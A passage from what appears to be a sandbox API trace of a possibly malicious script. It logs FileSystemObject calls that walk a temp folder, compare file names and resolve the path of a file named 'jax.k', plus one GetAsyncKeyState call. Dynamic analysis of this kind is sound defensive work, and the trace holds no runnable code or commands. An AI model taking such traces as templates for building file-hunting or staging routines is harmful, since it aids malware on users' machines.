celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.410] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.410] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="d_Ij6 xf.rtf", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.410] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.410] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.410] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.410] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FtqPX_huQ_Ya.odt", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.411] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.411] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.411] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.411] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FXSAPIDebugLogFile.txt", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.411] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.411] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.412] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.412] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="h86JHn.ots", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.412] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.412] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.412] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.412] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IauAeqRBw0DH.png", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.412] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x0 [0133.413] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.413] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.413] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="jax.k", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.413] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x1 [0133.413] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=0, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\keecfm~1\\appdata\\local\\temp\\jax.k" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\jax.k"), varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x1a7be8) returned 0x0 [0133.414] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x60, wReserved3=0x0, varVal1=0x1, varVal2=0x6e8ace9), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.414] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.414] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="JJt7D.avi", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.414] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.414] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6beb43c), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.414] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.414] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KNXCvMxg8XOje-.jpg", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.427] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.427] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.427] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.427] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="lKDHzb5_Jf6.wav", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.428] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.428] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.428] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.428] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LQZkOW5K95b6H_.jpg", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.428] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.428] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.428] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.428] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="m_B8GHB-PwPNvmpU.avi", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.429] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.429] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.429] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.429] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="nvodzp-aGgg2nb3LvTK.odp", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.429] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.429] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6c885b4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.429] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.429] FileSystemObject:IDispatch:Invoke (in: This=0x3234a54, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RcF018B_2GWcfx.mp4", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.430] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.430] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.431] GetAsyncKeyState (vKey=3) returned 0 [0133.431] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234aa4, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1a7ba4*="Name", cNames=0x1, lcid=0x409, rgDispId=0x1a7ba8 | out: rgDispId=0x1a7ba8*=1000) returned 0x0 [0133.431] FileSystemObject:IDispatch:Invoke (in: This=0x3234aa4, dispIdMember=1000, riid=0x66618098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8, pExcepInfo=0x1a7b5c, puArgErr=0x1a7b8c | out: pDispParams=0x1a7b7c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1a7be8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RH6_D9Tm9kL.pdf", varVal2=0x0), pExcepInfo=0x1a7b5c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1a7b8c*=0x0) returned 0x0 [0133.431] VarCmp (pvarLeft=0x1a7be8, pvarRight=0x1a7bb8, lcid=0x1, dwFlags=0x30001) returned 0x2 [0133.431] FileSystemObject:IEnumVARIANT:Next (in: This=0x84a1fe8, celt=0x1, rgvar=0x1a7b90*(varType=0x0, wReserved1=0x0, wReserved2=0x7c84, wReserved3=0x1a, varVal1=0x6643577f, varVal2=0x6bbb6c4), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0133.432] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x3234a54, 